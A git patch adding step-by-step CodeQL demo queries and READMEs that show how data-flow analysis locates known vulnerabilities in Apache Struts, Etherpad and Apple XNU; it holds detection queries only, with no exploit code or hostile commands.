--- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/04_compileAndExecute.ql @@ -0,0 +1,20 @@ +/** + * @name 04_compileAndExecute + */ + +import java + +/* Refactor the logic into a predicate. */ +predicate isOgnlSink(Expr arg) { + exists (Method m, MethodAccess ma + | m.getName() = "compileAndExecute" and + ma.getMethod() = m and + arg = ma.getArgument(0)) +} + +/* This query produces identical results to the previous one. We have just + * refactored the logic into a separate predicate. + */ +from Expr arg +where isOgnlSink(arg) +select arg diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/05_getNamespace.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/05_getNamespace.ql new file mode 100644 index 0000000..d1d7fa7 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/05_getNamespace.ql @@ -0,0 +1,18 @@ +/** + * @name 05_getNamespace + */ + +import java + +/* This predicate is currently unused, but we will need it again later. */ +predicate isOgnlSink(Expr arg) { + exists (Method m, MethodAccess ma + | m.getName() = "compileAndExecute" and + ma.getMethod() = m and + arg = ma.getArgument(0)) +} + +/* Find methods named "getNamespace". */ +from Method m +where m.getName() = "getNamespace" +select m diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/06_getNamespace.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/06_getNamespace.ql new file mode 100644 index 0000000..eb92ba9 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/06_getNamespace.ql @@ -0,0 +1,20 @@ +/** + * @name 06_getNamespace + */ + +import java + +predicate isOgnlSink(Expr arg) { + exists (Method m, MethodAccess ma + | m.getName() = "compileAndExecute" and + ma.getMethod() = m and + arg = ma.getArgument(0)) +} + +/* We are only interested in methods that override ActionProxy::getNamespace. */ +from Method m, Method n +where + m.getName() = "getNamespace" and + m.getDeclaringType().getName() = "ActionProxy" and + n.overrides*(m) +select n diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/07_getNamespace.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/07_getNamespace.ql new file mode 100644 index 0000000..f62a892 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/07_getNamespace.ql @@ -0,0 +1,21 @@ +/** + * @name 07_getNamespace + */ + +import java + +predicate isOgnlSink(Expr arg) { + exists (Method m, MethodAccess ma + | m.getName() = "compileAndExecute" and + ma.getMethod() = m and + arg = ma.getArgument(0)) +} + +/* Find calls to getNamespace. */ +from Method m, Method n, MethodAccess ma +where + m.getName() = "getNamespace" and + m.getDeclaringType().getName() = "ActionProxy" and + n.overrides*(m) and + ma.getMethod() = n +select ma diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/08_getNamespace.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/08_getNamespace.ql new file mode 100644 index 0000000..d66d0b1 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/08_getNamespace.ql @@ -0,0 +1,28 @@ +/** + * @name 08_getNamespace + */ + +import java + +predicate isOgnlSink(Expr arg) { + exists (Method m, MethodAccess ma + | m.getName() = "compileAndExecute" and + ma.getMethod() = m and + arg = ma.getArgument(0)) +} + +/* Refactor the logic into a predicate. */ +predicate isActionProxySource(MethodAccess ma) { + exists (Method m, Method n + | m.getName() = "getNamespace" and + m.getDeclaringType().getName() = "ActionProxy" and + n.overrides*(m) and + ma.getMethod() = n) +} + +/* This query produces identical results to the previous one. We have just + * refactored the logic into a separate predicate. + */ +from MethodAccess ma +where isActionProxySource(ma) +select ma diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/09_dataflow.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/09_dataflow.ql new file mode 100644 index 0000000..9d3173f --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/09_dataflow.ql @@ -0,0 +1,42 @@ +/** + * @name 09_dataflow + * @kind path-problem + */ + +import java +import semmle.code.java.dataflow.DataFlow +import DataFlow::PathGraph + +predicate isOgnlSink(Expr arg) { + exists (Method m, MethodAccess ma + | m.getName() = "compileAndExecute" and + ma.getMethod() = m and + arg = ma.getArgument(0)) +} + +predicate isActionProxySource(MethodAccess ma) { + exists (Method m, Method n + | m.getName() = "getNamespace" and + m.getDeclaringType().getName() = "ActionProxy" and + n.overrides*(m) and + ma.getMethod() = n) +} + +class OgnlCfg extends DataFlow::Configuration { + OgnlCfg() { this = "ognl" } + + override predicate isSource(DataFlow::Node source) { + isActionProxySource(source.asExpr()) + } + + override predicate isSink(DataFlow::Node sink) { + isOgnlSink(sink.asExpr()) + } +} + +/* First version of the dataflow query. We use isActionProxySource + * as the source and isOgnlSink as the sink. + */ +from OgnlCfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select source, source, sink, "ognl" diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/10_dataflow_with_barrier.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/10_dataflow_with_barrier.ql new file mode 100644 index 0000000..16332e2 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/10_dataflow_with_barrier.ql @@ -0,0 +1,50 @@ +/** + * @name 10_dataflow_with_barrier + * @kind path-problem + */ + +import java +import semmle.code.java.dataflow.DataFlow +import DataFlow::PathGraph + +predicate isOgnlSink(Expr arg) { + exists (Method m, MethodAccess ma + | m.getName() = "compileAndExecute" and + ma.getMethod() = m and + arg = ma.getArgument(0)) +} + +predicate isActionProxySource(MethodAccess ma) { + exists (Method m, Method n + | m.getName() = "getNamespace" and + m.getDeclaringType().getName() = "ActionProxy" and + n.overrides*(m) and + ma.getMethod() = n) +} + +class OgnlCfg extends DataFlow::Configuration { + OgnlCfg() { this = "ognl" } + + override predicate isSource(DataFlow::Node source) { + isActionProxySource(source.asExpr()) + } + + override predicate isSink(DataFlow::Node sink) { + isOgnlSink(sink.asExpr()) + } + + override predicate isBarrier(DataFlow::Node node) { + node.getEnclosingCallable().getDeclaringType().getName() = "ValueStackShadowMap" + } +} + +/* If you look at the results of the previous query in the path viewer + * then you will see that a lot of the results are not interesting + * because they go via the class named "ValueStackShadowMap". This class + * is rarely used in practice, so we want to exclude paths that go + * through it. In this version of the query, we have overridden + * `isBarrier` to exclude those paths. + */ +from OgnlCfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select source, source, sink, "ognl" diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/11_dataflow_with_additional_flow_step.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/11_dataflow_with_additional_flow_step.ql new file mode 100644 index 0000000..8cecdf1 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/11_dataflow_with_additional_flow_step.ql @@ -0,0 +1,65 @@ +/** + * @name 11_dataflow_with_additional_flow_step + * @kind path-problem + */ + +import java +import semmle.code.java.dataflow.DataFlow +import semmle.code.java.dataflow.TaintTracking +import DataFlow::PathGraph + +predicate isOgnlSink(Expr arg) { + exists (Method m, MethodAccess ma + | m.getName() = "compileAndExecute" and + ma.getMethod() = m and + arg = ma.getArgument(0)) +} + +predicate isActionProxySource(MethodAccess ma) { + exists (Method m, Method n + | m.getName() = "getNamespace" and + m.getDeclaringType().getName() = "ActionProxy" and + n.overrides*(m) and + ma.getMethod() = n) +} + +class OgnlCfg extends DataFlow::Configuration { + OgnlCfg() { this = "ognl" } + + override predicate isSource(DataFlow::Node source) { + isActionProxySource(source.asExpr()) + } + + override predicate isSink(DataFlow::Node sink) { + isOgnlSink(sink.asExpr()) + } + + override predicate isBarrier(DataFlow::Node node) { + node.getEnclosingCallable().getDeclaringType().getName() = "ValueStackShadowMap" + } + + override predicate isAdditionalFlowStep(DataFlow::Node node1, DataFlow::Node node2) { + TaintTracking::localTaintStep(node1, node2) + } +} + +/* The previous query found one good result. The query described in + * Mo's blog post finds more results than that. What's the difference? + * + * The difference is that Mo's query includes more dataflow steps. + * The default DataFlow configuration is very conservative. It only + * tracks dataflow when the value is passed unmodified from one + * method to the next. But if the value is modified in any way, even + * something very simple like adding 1 to an integer, then it will + * stop tracking. Often we want to continue tracking the flow in + * such cases. We can do that by adding extra flow steps in the + * configuration. In this query, we have added "local taint" edges. + * Now we get a second result (in `ActionChainResult.java`), which + * is one of the serious RCE vulnerabilities. + * + * The full query adds even more additional dataflow steps, which is + * why it finds 10 results, rather than just 2. + */ +from OgnlCfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select source, source, sink, "ognl" diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/README.md b/ql_demos/java/Apache_Struts_CVE-2018-11776/README.md new file mode 100644 index 0000000..eb5e7bd --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/README.md @@ -0,0 +1,14 @@ +# Apache Struts CVE-2018-11776 + +[Blog post](https://lgtm.com/blog/apache_struts_CVE-2018-11776) + +[This snapshot](https://downloads.lgtm.com/snapshots/java/apache/struts/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug. + +The queries in this directory are slightly simplified to make the demo easier to follow. As a result, they don't find as many variants as the query described in the blog post. The full query can be found [here](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql). + +# Suggested workflow + +* First run the [final query](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql). +** Show the result in the path viewer. +* Show how to build a similar query step by step. +** We will build a slightly simplified version of the query, so it won't find as many results, but it still finds one of the RCEs. diff --git a/ql_demos/java/queries.xml b/ql_demos/java/queries.xml new file mode 100644 index 0000000..0d33187 --- /dev/null +++ b/ql_demos/java/queries.xml @@ -0,0 +1 @@ + diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/01_HTTP_handlers.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/01_HTTP_handlers.ql new file mode 100644 index 0000000..586316a --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/01_HTTP_handlers.ql @@ -0,0 +1,20 @@ +import javascript + +/** + * A function with `req` and `res` parameters, and hence most likely an + * HTTP route handler. + */ +class LikelyRouteHandler extends DataFlow::FunctionNode { + DataFlow::ParameterNode req; + DataFlow::ParameterNode res; + + LikelyRouteHandler() { + req = getParameter(0) and req.getName() = "req" and + res = getParameter(1) and res.getName() = "res" + } +} + +// Find HTTP route handlers, using the heuristic of looking for parameters +// named `req` and `res`. +from LikelyRouteHandler l +select l diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/02_getASendMethodCall.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/02_getASendMethodCall.ql new file mode 100644 index 0000000..b38edd5 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/02_getASendMethodCall.ql @@ -0,0 +1,42 @@ +import javascript + +/** + * A function with `req` and `res` parameters, and hence most likely an + * HTTP route handler. + */ +class LikelyRouteHandler extends DataFlow::FunctionNode { + DataFlow::ParameterNode req; + DataFlow::ParameterNode res; + + LikelyRouteHandler() { + req = getParameter(0) and req.getName() = "req" and + res = getParameter(1) and res.getName() = "res" + } + + /** Gets a method of `res` that sends an HTTP response. */ + string getASendMethodName() { + // res.send + result = "send" + or + // or a method `m` such that there is an assignment `res.m = res.n` where `n` + // is already known to be a send method + exists (DataFlow::PropWrite pwn | + pwn = res.getAPropertyWrite(result) and + pwn.getRhs() = getASendMethodReference() + ) + } + + /** Gets a reference to `res.send` or some other known send method. */ + DataFlow::PropRead getASendMethodReference() { + result = res.getAPropertyRead(getASendMethodName()) + } + + /** Gets a call to the send method. */ + DataFlow::CallNode getASendMethodCall() { + result = getASendMethodReference().getACall() + } +} + +// Find `send` calls, which is where the code is sending a reply message. +from LikelyRouteHandler l +select l.getASendMethodCall() diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/03_LikelySendArgument.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/03_LikelySendArgument.ql new file mode 100644 index 0000000..d15eac0 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/03_LikelySendArgument.ql @@ -0,0 +1,51 @@ +import javascript +import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss + +/** + * A function with `req` and `res` parameters, and hence most likely an + * HTTP route handler. + */ +class LikelyRouteHandler extends DataFlow::FunctionNode { + DataFlow::ParameterNode req; + DataFlow::ParameterNode res; + + LikelyRouteHandler() { + req = getParameter(0) and req.getName() = "req" and + res = getParameter(1) and res.getName() = "res" + } + + /** Gets a method of `res` that sends an HTTP response. */ + string getASendMethodName() { + // res.send + result = "send" + or + // or a method `m` such that there is an assignment `res.m = res.n` where `n` + // is already known to be a send method + exists (DataFlow::PropWrite pwn | + pwn = res.getAPropertyWrite(result) and + pwn.getRhs() = getASendMethodReference() + ) + } + + /** Gets a reference to `res.send` or some other known send method. */ + DataFlow::PropRead getASendMethodReference() { + result = res.getAPropertyRead(getASendMethodName()) + } + + /** Gets a call to the send method. */ + DataFlow::CallNode getASendMethodCall() { + result = getASendMethodReference().getACall() + } +} + +/** An argument passed to `res.send`, marked as an XSS sink. */ +class LikelySendArgument extends Sink { + LikelySendArgument() { + this = any(LikelyRouteHandler rh).getASendMethodCall().getAnArgument() + } +} + +// We will treat arguments of the `send` functions as the sinks in our +// data flow analysis. +from LikelySendArgument arg +select arg diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/04_LikelyRequestParameter.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/04_LikelyRequestParameter.ql new file mode 100644 index 0000000..6d80d79 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/04_LikelyRequestParameter.ql @@ -0,0 +1,68 @@ +import javascript +import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss + +/** + * A function with `req` and `res` parameters, and hence most likely an + * HTTP route handler. + */ +class LikelyRouteHandler extends DataFlow::FunctionNode { + DataFlow::ParameterNode req; + DataFlow::ParameterNode res; + + LikelyRouteHandler() { + req = getParameter(0) and req.getName() = "req" and + res = getParameter(1) and res.getName() = "res" + } + + DataFlow::ParameterNode getRequestParameter() { + result = req + } + + /** Gets a method of `res` that sends an HTTP response. */ + string getASendMethodName() { + // res.send + result = "send" + or + // or a method `m` such that there is an assignment `res.m = res.n` where `n` + // is already known to be a send method + exists (DataFlow::PropWrite pwn | + pwn = res.getAPropertyWrite(result) and + pwn.getRhs() = getASendMethodReference() + ) + } + + /** Gets a reference to `res.send` or some other known send method. */ + DataFlow::PropRead getASendMethodReference() { + result = res.getAPropertyRead(getASendMethodName()) + } + + /** Gets a call to the send method. */ + DataFlow::CallNode getASendMethodCall() { + result = getASendMethodReference().getACall() + } +} + +/** An argument passed to `res.send`, marked as an XSS sink. */ +class LikelySendArgument extends Sink { + LikelySendArgument() { + this = any(LikelyRouteHandler rh).getASendMethodCall().getAnArgument() + } +} + +/** An access to a request parameter, marked as an XSS source. */ +class LikelyRequestParameter extends Source, DataFlow::SourceNode { + LikelyRequestParameter() { + exists (DataFlow::SourceNode base | this = base.getAPropertyRead() | + // either a property access on `req` itself + base = any(LikelyRouteHandler rh).getRequestParameter() + or + // or a more deeply nested property access + base instanceof LikelyRequestParameter + ) + } +} + +// We will treat the parameters of the route handler functions as the +// sources in our data flow analysis. +from LikelyRequestParameter p +select p diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/05_DataFlow.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/05_DataFlow.ql new file mode 100644 index 0000000..d6b1369 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/05_DataFlow.ql @@ -0,0 +1,78 @@ +/** + * @name Etherpad Reflected File Download CVE-2018-6835 + * @description Returning an unsanitized string in a HTTP response + * could cause a Reflected File Download (RFD) vulnerability. + * @kind path-problem + * @problem.severity warning + * @id etherpad/javascript/rfd-cve-2018-6835 + */ + +import javascript +import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss +import DataFlow::PathGraph + +/** + * A function with `req` and `res` parameters, and hence most likely an + * HTTP route handler. + */ +class LikelyRouteHandler extends DataFlow::FunctionNode { + DataFlow::ParameterNode req; + DataFlow::ParameterNode res; + + LikelyRouteHandler() { + req = getParameter(0) and req.getName() = "req" and + res = getParameter(1) and res.getName() = "res" + } + + DataFlow::ParameterNode getRequestParameter() { + result = req + } + + /** Gets a method of `res` that sends an HTTP response. */ + string getASendMethodName() { + // res.send + result = "send" + or + // or a method `m` such that there is an assignment `res.m = res.n` where `n` + // is already known to be a send method + exists (DataFlow::PropWrite pwn | + pwn = res.getAPropertyWrite(result) and + pwn.getRhs() = getASendMethodReference() + ) + } + + /** Gets a reference to `res.send` or some other known send method. */ + DataFlow::PropRead getASendMethodReference() { + result = res.getAPropertyRead(getASendMethodName()) + } + + /** Gets a call to the send method. */ + DataFlow::CallNode getASendMethodCall() { + result = getASendMethodReference().getACall() + } +} + +/** An argument passed to `res.send`, marked as an XSS sink. */ +class LikelySendArgument extends Sink { + LikelySendArgument() { + this = any(LikelyRouteHandler rh).getASendMethodCall().getAnArgument() + } +} + +/** An access to a request parameter, marked as an XSS source. */ +class LikelyRequestParameter extends Source, DataFlow::SourceNode { + LikelyRequestParameter() { + exists (DataFlow::SourceNode base | this = base.getAPropertyRead() | + // either a property access on `req` itself + base = any(LikelyRouteHandler rh).getRequestParameter() + or + // or a more deeply nested property access + base instanceof LikelyRequestParameter + ) + } +} + +// We are now ready to run the data flow analysis. +from Configuration xss, DataFlow::PathNode source, DataFlow::PathNode sink +where xss.hasFlowPath(source, sink) +select sink, source, sink, "Reflected File Download (RFD) vulnerability" diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql new file mode 100644 index 0000000..55e2e08 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql @@ -0,0 +1,99 @@ +/** + * @name Etherpad Reflected File Download CVE-2018-6835 + * @description Returning an unsanitized string in a HTTP response + * could cause a Reflected File Download (RFD) vulnerability. + * @kind path-problem + * @problem.severity warning + * @id etherpad/javascript/rfd-cve-2018-6835 + */ + +import javascript +import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss +import DataFlow::PathGraph + +/** + * A function with `req` and `res` parameters, and hence most likely an + * HTTP route handler. + */ +class LikelyRouteHandler extends DataFlow::FunctionNode { + DataFlow::ParameterNode req; + DataFlow::ParameterNode res; + + LikelyRouteHandler() { + req = getParameter(0) and req.getName() = "req" and + res = getParameter(1) and res.getName() = "res" + } + + DataFlow::ParameterNode getRequestParameter() { + result = req + } + + /** Gets a method of `res` that sends an HTTP response. */ + string getASendMethodName() { + // res.send + result = "send" + or + // or a method `m` such that there is an assignment `res.m = res.n` where `n` + // is already known to be a send method + exists (DataFlow::PropWrite pwn | + pwn = res.getAPropertyWrite(result) and + pwn.getRhs() = getASendMethodReference() + ) + } + + /** Gets a reference to `res.send` or some other known send method. */ + DataFlow::PropRead getASendMethodReference() { + result = res.getAPropertyRead(getASendMethodName()) + } + + /** Gets a call to the send method. */ + DataFlow::CallNode getASendMethodCall() { + result = getASendMethodReference().getACall() + } +} + +/** An argument passed to `res.send`, marked as an XSS sink. */ +class LikelySendArgument extends Sink { + LikelySendArgument() { + this = any(LikelyRouteHandler rh).getASendMethodCall().getAnArgument() + } +} + +/** An access to a request parameter, marked as an XSS source. */ +class LikelyRequestParameter extends Source, DataFlow::SourceNode { + LikelyRequestParameter() { + exists (DataFlow::SourceNode base | this = base.getAPropertyRead() | + // either a property access on `req` itself + base = any(LikelyRouteHandler rh).getRequestParameter() + or + // or a more deeply nested property access + base instanceof LikelyRequestParameter + ) + } +} + +/** A call to `is-var-name`, considered as a sanitizer for untrusted user input. */ +class IsVarNameSanitizer extends TaintTracking::AdditionalSanitizerGuardNode, DataFlow::CallNode { + IsVarNameSanitizer() { + this = DataFlow::moduleImport("is-var-name").getACall() or + this = DataFlow::moduleMember("./isValidJSONPName", "check").getACall() + } + + override predicate appliesTo(TaintTracking::Configuration cfg) { + any() + } + + override predicate sanitizes(boolean outcome, Expr e) { + outcome = true and + e = getArgument(0).asExpr() + } +} + +// The vulnerability was fixed on 2018-03-23 by adding a call to isValidJSONPName: +// +// https://lgtm.com/projects/g/ether/etherpad-lite/rev/dd7894d3c9389a000d11d3a89962d9fcc9c6c44b +// +// This version of the query adds a sanitizer to exclude those results. +from Configuration xss, DataFlow::PathNode source, DataFlow::PathNode sink +where xss.hasFlowPath(source, sink) +select sink, source, sink, "Reflected File Download (RFD) vulnerability" diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/README.md b/ql_demos/javascript/Etherpad_CVE-2018-6835/README.md new file mode 100644 index 0000000..95a12a7 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/README.md @@ -0,0 +1,5 @@ +[Blog post](https://lgtm.com/blog/etherpad_CVE-2018-6835) + +[This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.2.zip) has the vulnerability. + +For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip). diff --git a/ql_demos/javascript/queries.xml b/ql_demos/javascript/queries.xml new file mode 100644 index 0000000..d434629 --- /dev/null +++ b/ql_demos/javascript/queries.xml @@ -0,0 +1 @@ + From 914597b38448aa9f783f37f79b5c3a11a68effae Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Fri, 1 Feb 2019 15:12:26 +0000 Subject: [PATCH 02/36] Demo of XNU icmp_error CVE-2018-4407. --- .../00_mbuf_copydata_tainted_size.ql | 43 ++++++++++++++++++ .../01_paths_to_icmp_error.ql | 40 +++++++++++++++++ .../02_paths_to_icmp_error.ql | 39 ++++++++++++++++ .../03_paths_to_icmp_error.ql | 44 +++++++++++++++++++ .../XNU_icmp_error_CVE-2018-4407/README.md | 5 +++ 5 files changed, 171 insertions(+) create mode 100644 ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql create mode 100644 ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/01_paths_to_icmp_error.ql create mode 100644 ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/02_paths_to_icmp_error.ql create mode 100644 ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/03_paths_to_icmp_error.ql create mode 100644 ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/README.md diff --git a/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql new file mode 100644 index 0000000..b34679d --- /dev/null +++ b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql @@ -0,0 +1,43 @@ +/** + * @name 00 mbuf copydata with tainted size + * @description Calling m_copydata with an untrusted size argument + * could cause a buffer overflow. + * @kind path-problem + * @problem.severity warning + * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size + */ + +/* + * This query is explained in detail in this blog post: + * + * https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 + * + * It is based on the assumption that the function `m_mtod`, which returns + * a pointer to the data stored in an `mbuf`, often returns a buffer + * containing untrusted data. + * + * The query has multiple results. The interesting result is the one in + * `ip_icmp.c`. + */ + +import cpp +import semmle.code.cpp.dataflow.TaintTracking +import DataFlow::PathGraph + +class Config extends TaintTracking::Configuration { + Config() { this = "mbuf copydata with tainted size" } + + override predicate isSource(DataFlow::Node source) { + source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod" + } + + override predicate isSink(DataFlow::Node sink) { + exists (FunctionCall call + | call.getArgument(2) = sink.asExpr() and + call.getTarget().getName().matches("%copydata")) + } +} + +from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select sink, source, sink, "m_copydata with tainted size." diff --git a/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/01_paths_to_icmp_error.ql b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/01_paths_to_icmp_error.ql new file mode 100644 index 0000000..9514ed1 --- /dev/null +++ b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/01_paths_to_icmp_error.ql @@ -0,0 +1,40 @@ +/** + * @name 01 Paths from ip_input to icmp_error + * @description Find data-flow paths that lead from ip_input to the first parameter of icmp_error. + * @kind path-problem + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow +import DataFlow::PathGraph + +/* + * The previous query, 00_mbuf_copydata_tainted_size.ql, discovered some + * dodgy looking code in `icmp_error`. But is it exploitable? To find out + * we need to figure if the zero'th parameter of `icmp_error`, an `mbuf` + * named `n`, is attacker-controllable. + * + * This initial query looks for expression that flows to parameter `n`. + */ + +class Config extends DataFlow::Configuration { + Config() { this = "Paths from ip_input to icmp_error" } + + override predicate isSource(DataFlow::Node source) { + // Any expression is a valid source. + exists (source.asExpr()) + } + + override predicate isSink(DataFlow::Node sink) { + // The sink is the zero'th parameter of `icmp_error`: `struct mbuf *n`. + exists (Parameter p + | p = sink.asParameter() and + p.getFunction().getName() = "icmp_error" and + p.getIndex() = 0) + } +} + +from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select source, source, sink, "Expression flows to icmp_error." diff --git a/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/02_paths_to_icmp_error.ql b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/02_paths_to_icmp_error.ql new file mode 100644 index 0000000..2ecb5e1 --- /dev/null +++ b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/02_paths_to_icmp_error.ql @@ -0,0 +1,39 @@ +/** + * @name 02 Paths from ip_input to icmp_error + * @description Find data-flow paths that lead from ip_input to the first parameter of icmp_error. + * @kind path-problem + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow +import DataFlow::PathGraph + +/* + * The previous iteration of this query found every expression that flows + * to parameter `n` of `icmp_error`. The most interesting looking results + * were the ones that started in the function `ip_input` because that is + * where incoming IP packets are handled. So we restrict `isSource` to only + * expressions from `ip_input`. + */ + +class Config extends DataFlow::Configuration { + Config() { this = "Paths from ip_input to icmp_error" } + + override predicate isSource(DataFlow::Node source) { + exists (source.asExpr()) and + source.getFunction().getName() = "ip_input" + } + + override predicate isSink(DataFlow::Node sink) { + // The sink is the zero'th parameter of `icmp_error`: `struct mbuf *n`. + exists (Parameter p + | p = sink.asParameter() and + p.getFunction().getName() = "icmp_error" and + p.getIndex() = 0) + } +} + +from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select source, source, sink, "Expression flows to icmp_error." diff --git a/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/03_paths_to_icmp_error.ql b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/03_paths_to_icmp_error.ql new file mode 100644 index 0000000..a4c3bb9 --- /dev/null +++ b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/03_paths_to_icmp_error.ql @@ -0,0 +1,44 @@ +/** + * @name 03 Paths from ip_input to icmp_error + * @description Find data-flow paths that lead from ip_input to the first parameter of icmp_error. + * @kind path-problem + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow +import DataFlow::PathGraph + +/* + * The previous query found many dataflow paths that went via the function + * `ip_forward`. Those paths look a little complicated, so lets see if we + * can find something simpler. In this query, we use the `isBarrier` method + * to exclude any path that goes via `ip_forward`. This reduces the number + * of results to a much smaller number and we quickly find that there is an + * easy exploitation path via the function `ip_dooptions`. + */ + +class Config extends DataFlow::Configuration { + Config() { this = "Paths from ip_input to icmp_error" } + + override predicate isSource(DataFlow::Node source) { + exists (source.asExpr()) and + source.getFunction().getName() = "ip_input" + } + + override predicate isSink(DataFlow::Node sink) { + // The sink is the zero'th parameter of `icmp_error`: `struct mbuf *n`. + exists (Parameter p + | p = sink.asParameter() and + p.getFunction().getName() = "icmp_error" and + p.getIndex() = 0) + } + + override predicate isBarrier(DataFlow::Node node) { + node.getFunction().getName() = "ip_forward" + } +} + +from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select source, source, sink, "Expression flows to icmp_error." diff --git a/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/README.md b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/README.md new file mode 100644 index 0000000..cae2e9c --- /dev/null +++ b/ql_demos/cpp/XNU_icmp_error_CVE-2018-4407/README.md @@ -0,0 +1,5 @@ +# Apple XNU icmp_error CVE-2018-4407 + +Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo. + +There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://lgtm.com/blog/apple_xnu_icmp_nfs_pocs), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is 